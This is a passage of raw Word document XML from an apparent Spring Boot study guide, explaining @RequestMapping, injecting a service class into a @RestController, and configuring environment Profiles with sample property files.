    <w:p w14:paraId="20FCD082"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Fine-Grained Control:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD7CF0A" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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rovides flexibility in defining request parameters, headers, and the HTTP method type (GET, POST, PUT, DELETE) on a per-method basis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2E74DE"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ombination with Class-Level Annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4046585E" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E"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 xml:space="preserve">You can use @RequestMapping at the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class level</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify a common base path, then fine-tune specific method-level mappings for different endpoints within that class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B8E164"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Example with Class-Level @RequestMapping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ABB1F8"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D71524"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questMapping("/api")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3752D9B3"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MyController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0076823F" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6F52AC"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Handles GET request at /api/hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C37BA3"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questMapping(value = "/hello", method = RequestMethod.GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706AD169"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ring sayHello() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0A7FF"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Hello, World!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4769CF68"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4146A697" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E71D894"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Handles POST request at /api/submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E8AEC"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questMapping(value = "/submit", method = RequestMethod.POST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77743B73"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ring submitData(@RequestBody String data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4119A211"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Data Submitted: " + data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6B2BCA"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1D7B8E0C"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2805158A" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661804EE"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GET /api/hello</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will invoke sayHello().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42820856"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OST /api/submit</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will invoke submitData().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118697F9" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790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summary, using @RequestMapping at the method level allows you to control the HTTP method type, URL pattern, and other request-related parameters for each specific controller method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507CD9C9" w14:textId="210B01F6"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C88394C">
          <v:rect id="_x0000_i2612" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32B054" w14:textId="33EF8E32" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="008019C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="618" w:name="_Toc196308098"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to map Service class to RestController</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="618"/>
    </w:p>
    <w:p w14:paraId="7735860E" w14:textId="140CBE64" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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 a Spring Boot application, you typically map a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class to a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@RestController</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by injecting the service into a controller class, which handles the HTTP requests. The controller will act as a mediator between the client (making requests) and the service (performing business logic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B64C617"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Here's a step-by-step guide on how to map a Service class to a @RestController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441035B3" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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Create the Service Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8E999"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service class contains the business logic of your application. It is typically annotated with @Service and can have methods that perform specific operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5656B1"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6148A269" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8B7561"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1322DEE9"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCE4DDD" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748DDA1E"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ring getEmployeeDetails(int employeeId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F5B201"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In a real application, this would fetch data from the database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBA82A3"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Employee details for ID: " + employeeId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A32A2D9"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139E38F9"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37FC6FA4" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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Create the RestController Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A53AF7B"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controller class will be annotated with @RestController and will use the service class to perform operations. It will also handle HTTP requests and map them to service methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FF7C6"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73512498"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web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5C7DE"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web.bind.annotation.PathVariable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120151D0"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web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC5AF3" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A29F393"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0671F2F9"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EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C82E025" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DDD34B"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0FFFB4A6"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 xml:space="preserve">    private EmployeeService employeeService; // Injecting the Service class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1F3F5" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB8EBED"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tMapping("/employee/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073FA87C"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ring getEmployee(@PathVariable("id") int employeeId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F582B"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employeeService.getEmployeeDetails(employeeId); // Calling the service method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2356292A"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B75E4EF"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34DC72E7" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0830C5BD"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@RestController</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation tells Spring to treat the class as a REST API controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E9184"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Autowired</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation automatically injects an instance of the EmployeeService into the EmployeeController.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C15515"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@GetMapping</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation maps the GET /employee/{id} HTTP request to the getEmployee() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA088F"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method getEmployeeDetails() from the service class is called to process the business logic and return the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1557083B" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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4. Running the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E36E57"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hen you run the application, the controller will be available at the specified endpoint (/employee/{id}). For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0CCE35"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GET /employee/1</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will return Employee details for ID: 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4F8F7B" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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Full Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434065C8" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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ervice Class (EmployeeService.java):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D8C7D"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0953614B" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC83177"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E9D6A"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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89B6A9" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1431525B"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ring getEmployeeDetails(int employeeId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4331222F"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Simulating fetching data for an employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF93698"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Employee details for ID: " + employeeId;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B05709"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0D07CABD"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7EF97FA9" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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Controller Class (EmployeeController.java):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A36FC7"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D040906"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web.bind.annotation.GetMapping;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDAFBF4"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web.bind.annotation.PathVariable;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22009224"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web.bind.annotation.RestController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF32208" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6D542A"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79429F21"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EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDFA6F5" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E14C31F"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1D8E45FE"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EmployeeService employeeService; // Injecting the service class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761FF0EB" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="426A6ACC"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tMapping("/employee/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078FDEAB"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ring getEmployee(@PathVariable("id") int employeeId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355DEF55"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employeeService.getEmployeeDetails(employeeId); // Calling the service method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB365F8"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505BCFFB"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D46B7CF" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D06620E"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ervice class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contains the business logic and is annotated with @Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EC959F"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RestController class</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is annotated with @RestController and uses the service class to perform business operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734A2C4"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inject the service class into the controller class using @Autowired and call its methods inside the controller's endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39552746" w14:textId="77777777" w:rsidR="004879E2" w:rsidRPr="002C6305" w:rsidRDefault="004879E2"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approach helps separate concerns, with the controller focusing on HTTP request handling and the service class containing the actual business logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35220AF1" w14:textId="14B766ED"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0CC326D">
          <v:rect id="_x0000_i2613" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59180C58" w14:textId="30E010A3" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="008019C5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="619" w:name="_Toc196308099"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What are Profiles in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="619"/>
    </w:p>
    <w:p w14:paraId="1E91AA9D" w14:textId="4A3CF97A" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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 Spring Boot, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Profiles</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used to define different configurations for different environments (e.g., development, testing, production). A profile allows you to group beans and configuration settings that are specific to a particular environment. This makes it easier to manage configuration changes for different stages of the application lifecycle without changing the actual code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554B1E87"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Key Points About Profiles in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDF048C"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nvironment-specific configurations</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can define beans and properties that are specific to a particular environment (e.g., dev, prod, test).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE5117"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elective activation</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can activate specific profiles during application startup, and Spring Boot will only load the beans and properties that belong to the active profile(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339BE37"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ternal configuration management</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Profiles allow you to externalize your configurations (e.g., using application property files for each environment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49431C2C"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How to Define and Use Profiles in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C95CF"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Define Profiles in application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482BE729"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define profile-specific configuration in different application.properties or application.yml files for each environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574FFC3D"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For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CA307"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pplication-dev.properties (for the development profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5857087A"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pplication-prod.properties (for the production profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED0E5C"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pplication-test.properties (for the testing profile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4C9153"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 in application-dev.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566FF5F1"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rl=jdbc:mysql://localhost:3306/dev_db</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203B01C2"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sername=devuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF35D6"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password=devpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C811BB9"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 in application-prod.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10115EE7"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rl=jdbc:mysql://prod-db-server:3306/prod_db</w:t>
      </w:r>
    </w:p>
